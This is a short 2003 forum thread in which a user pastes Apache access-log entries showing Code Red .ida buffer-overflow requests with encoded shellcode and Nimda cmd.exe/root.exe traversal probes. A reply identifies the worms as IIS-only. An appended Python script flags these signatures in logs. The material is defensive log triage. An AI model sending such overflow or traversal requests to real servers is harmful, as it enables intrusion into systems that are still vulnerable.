LinuxQuestions.org
Old 06-13-2003, 04:46 PM   #1
saturn_vk
strange apache access.log


I get these strange hits in the log:
Code:
213.47.116.38 - - [11/Jun/2003:00:21:32 +0300] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%
u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 -
213.145.18.88 - - [11/Jun/2003:03:09:08 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
213.245.99.128 - - [11/Jun/2003:15:01:46 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
213.130.85.164 - - [11/Jun/2003:17:24:43 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 272
64.164.70.250 - - [11/Jun/2003:20:33:22 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
213.37.92.126 - - [12/Jun/2003:02:36:59 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
213.37.92.126 - - [12/Jun/2003:02:37:11 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
213.37.92.126 - - [12/Jun/2003:02:37:19 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
137.251.109.215 - - [12/Jun/2003:08:53:44 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404
 -
and similar ones.

Now I've checked in Google and the exe ones appear to be from a worm. Even though people say it only affects IIS(sp?), will it affect me?
But I could not find anything on the XXXXXXXXXXXXXXXXX....... hits.

Any suggestions? Should I report the IP to the ISP if it's a worm, or would that just be a waste of time as they would most probably figure it out?
 
Old 06-13-2003, 04:48 PM   #2
acid_kewpie
That's Nimda. Or Code Red... Just ignore it. It does only affect IIS, unless you, for some bizarre reason, do have a root.exe file which can be easily compromised... But it is still an access to the web server, so will be logged.
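An added example, not part of the thread: a small triage script that tags access-log entries like the ones quoted above by worm family and flags any probe the server answered with a 2xx status, which is the case the reply singles out. It assumes Apache common/combined log format; the sample lines are constructed (documentation IP addresses, shortened padding), and the family labels are a rough mapping of the request patterns to the two worms named in the reply.

```python
import re
from collections import Counter

# host ident user [timestamp] "request" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3}) (\S+)$')

# Request patterns seen in the thread's log excerpt (rough family mapping).
SIGNATURES = [
    # .ida request, or a bare run of %uXXXX escapes when the method/URL is missing
    ("code-red", re.compile(r"/default\.ida\?|(?:%u[0-9a-f]{4}){4,}", re.I)),
    # probes for cmd.exe / root.exe under IIS script directories
    ("nimda", re.compile(r"/(?:cmd|root)\.exe\?", re.I)),
]

def classify(line):
    """Return (ip, family, status, served) for a worm probe, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ip, _ts, request, status, _size = m.groups()
    for family, pattern in SIGNATURES:
        if pattern.search(request):
            # A 2xx status means the server returned content for the probe URL.
            return ip, family, int(status), status.startswith("2")
    return None

def summarize(lines):
    """Count probes per family and collect those that were actually served."""
    hits = [h for h in map(classify, lines) if h]
    return Counter(h[1] for h in hits), [h for h in hits if h[3]]

# Constructed sample input modelled on the entries in the first post.
PAD = "X" * 40
UENC = "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3"
SAMPLE = [
    f'192.0.2.10 - - [11/Jun/2003:00:21:32 +0300] "{PAD}{UENC}=a HTTP/1.0" 400 -',
    f'192.0.2.11 - - [11/Jun/2003:03:09:08 +0300] "GET /default.ida?{PAD}{UENC}=a  HTTP/1.0" 404 272',
    '192.0.2.12 - - [11/Jun/2003:20:33:22 +0300] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -',
    '192.0.2.13 - - [12/Jun/2003:02:36:59 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277',
    '192.0.2.14 - - [12/Jun/2003:09:00:00 +0300] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    families, served = summarize(SAMPLE)
    print("probes by family:", dict(families))
    print("probes answered with 2xx (review these):", served)
```

On a log like the one in the first post, every probe comes back 400 or 404, so the review list stays empty.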
 
  

